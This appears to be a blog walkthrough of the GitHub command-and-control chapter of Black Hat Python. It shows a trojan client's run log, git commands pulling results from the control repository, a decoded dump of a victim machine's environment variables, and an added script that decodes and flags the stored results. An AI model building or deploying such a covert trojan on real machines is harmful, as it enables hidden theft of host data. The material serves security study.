from Black Hat Python
GitHub Command and Control



The following code can be converted into an EXE with the py2exe tool on Windows.

http://www.py2exe.org/





Example of running the trojan code on the client:

python git_trojan.py
[*] get_trojan_config
[*] get_file_contents
[*] connect_to_github
[*] Found file abc.json
[*] Attempting to retrieve dirlister
[*] get_file_contents
[*] connect_to_github
[*] Found file modules/dirlister
[*] Attempting to retrieve environment
[*] get_file_contents
[*] connect_to_github
[*] Found file modules/environment
[*] module_runner
[*] In dirlister module.
[*] store_module_result
[*] connect_to_github
[*] module_runner
[*] In environment module.
[*] store_module_result
[*] connect_to_github



The client script uploads the results to the Git server, and they can be checked with the following git commands.

kjpark@kjpark-F9SG:~/code/PracticeAlgorithm/chapter7$ cd data
kjpark@kjpark-F9SG:~/code/PracticeAlgorithm/chapter7/data$ git pull origin master
remote: Counting objects: 10, done.
remote: Compressing objects: 100% (9/9), done.
remote: Total 10 (delta 0), reused 0 (delta 0), pack-reused 0
Unpacking objects: 100% (10/10), done.
From https://github.com/sedew810225/chapter7
 * branch            master     -> FETCH_HEAD
   c432f2c..d29f1cf  master     -> origin/master
Updating c432f2c..d29f1cf
Fast-forward
 data/abc/60121.data | 1 +
 data/abc/85593.data | 1 +
 2 files changed, 2 insertions(+)
 create mode 100644 data/abc/60121.data
 create mode 100644 data/abc/85593.data



Because the data is stored base64-encoded, you can simply decode it as follows.

kjpark@kjpark-F9SG:~/code/PracticeAlgorithm/chapter7/data$ base64 abc/60121.data
....

alBUQXdPek0yT2lvdWIyZG5QVEF3T3pNMk9pb3VjbUU5TURBN016WTZLaTUzWVhZOU1EQTdNelk2
S2k1aGVHRTlNREE3TXpZNktpNXZaMkU5TURBN016WTZLaTV6Y0hnOU1EQTdNelk2S2k1NGMzQm1Q
VEF3T3pNMk9pY3NJQ2RIU2xOZlJFVkNWVWRmVkU5UVNVTlRKem9nSjBwVElFVlNVazlTTzBwVElF
eFBSeWNzSUNkWVJFZGZVMFZCVkNjNklDZHpaV0YwTUNkOQ==


kjpark@kjpark-F9SG:~/code/PracticeAlgorithm/chapter7/data$ base64 -d abc/60121.data
{'LC_NUMERIC': 'ko_KR.UTF-8', 'WINDOWID': '39845898', 'MANDATORY_PATH': '/usr/share/gconf/gnome.mandatory.path', 'XDG_GREETER_DATA_DIR': '/var/lib/lightdm-data/kjpark', 'GNOME_DESKTOP_SESSION_ID': 'this-is-deprecated', 'GJS_DEBUG_OUTPUT': 'stderr', 'LESSOPEN': '| /usr/bin/lesspipe %s', 'XDG_VTNR': '7', 'QT_IM_MODULE': 'ibus', 'LOGNAME': 'kjpark', 'USER': 'kjpark', 'PATH': '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games', 'LC_PAPER': 'ko_KR.UTF-8', 'GNOME_KEYRING_CONTROL': '', 'GTK_IM_MODULE': 'ibus', 'DISPLAY': ':0', 'LANG': 'ko_KR.UTF-8', 'TERM': 'xterm-256color', 'SHELL': '/bin/bash', 'XDG_SESSION_PATH': '/org/freedesktop/DisplayManager/Session0', 'XAUTHORITY': '/home/kjpark/.Xauthority', 'LANGUAGE': 'ko:en_US:en', 'SESSION_MANAGER': 'local/kjpark-F9SG:@/tmp

...

ob=01;35:*.qt=01;35:*.nuv=01;35:*.wmv=01;35:*.asf=01;35:*.rm=01;35:*.rmvb=01;35:*.flc=01;35:*.avi=01;35:*.fli=01;35:*.flv=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.yuv=01;35:*.cgm=01;35:*.emf=01;35:*.axv=01;35:*.anx=01;35:*.ogv=01;35:*.ogx=01;35:*.aac=00;36:*.au=00;36:*.flac=00;36:*.m4a=00;36:*.mid=00;36:*.midi=00;36:*.mka=00;36:*.mp3=00;36:*.mpc=00;36:*.ogg=00;36:*.ra=00;36:*.wav=00;36:*.axa=00;36:*.oga=00;36:*.spx=00;36:*.xspf=00;36:', 'GJS_DEBUG_TOPICS': 'JS ERROR;JS LOG', 'XDG_SEAT': 'seat0'}kjpark@kjpar
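To see at a glance what such a repository exposes, here is an added example (not code from the book or from this post) that batch-decodes the stored result files and flags the environment keys an analyst reviewing the repository would care about. It assumes the book's storage format shown above: one base64 string per data file, decoding to the Python repr of the module's return value; the sample files and the SENSITIVE_KEYS watch list are constructed for this example.

```python
import ast
import base64
import binascii

# Constructed sample of what store_module_result leaves under data/<id>/<n>.data:
# one base64 string per file, decoding to the repr of the module's return value.
SAMPLE_FILES = {
    "abc/60121.data": base64.b64encode(
        repr({"USER": "kjpark", "SHELL": "/bin/bash", "PATH": "/usr/bin:/bin"}).encode()),
    "abc/85593.data": base64.b64encode(
        repr(["git_trojan.py", "abc.json", "modules"]).encode()),
    "abc/corrupt.data": b"not*valid*base64!!",  # simulates a damaged push
}

# Hypothetical watch list: environment keys that identify the victim user or host.
SENSITIVE_KEYS = {"USER", "LOGNAME", "HOME", "PATH", "SHELL", "XAUTHORITY", "SESSION_MANAGER"}


def decode_result(raw: bytes):
    """Base64-decode one stored result; return None instead of raising on bad input."""
    try:
        return base64.b64decode(raw, validate=True).decode("utf-8", errors="replace")
    except (binascii.Error, ValueError):
        return None


def parse_result(text: str):
    """Rebuild the module's repr safely with literal_eval; keep the raw string otherwise."""
    try:
        return ast.literal_eval(text)
    except (ValueError, SyntaxError):
        return text


def classify(value) -> str:
    """The environment module returns a dict, dirlister a list."""
    return {dict: "environment", list: "dirlister"}.get(type(value), "unknown")


def triage(files: dict) -> dict:
    """Map each result file to (module type, sorted sensitive env keys it exposed)."""
    report = {}
    for name, raw in files.items():
        text = decode_result(raw)
        if text is None:
            report[name] = ("undecodable", [])
            continue
        value = parse_result(text)
        kind = classify(value)
        exposed = sorted(k for k in value if k in SENSITIVE_KEYS) if kind == "environment" else []
        report[name] = (kind, exposed)
    return report
```

Pointing `triage` at the real files under `data/` (read each one as bytes) gives the same per-file summary for a pulled repository.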

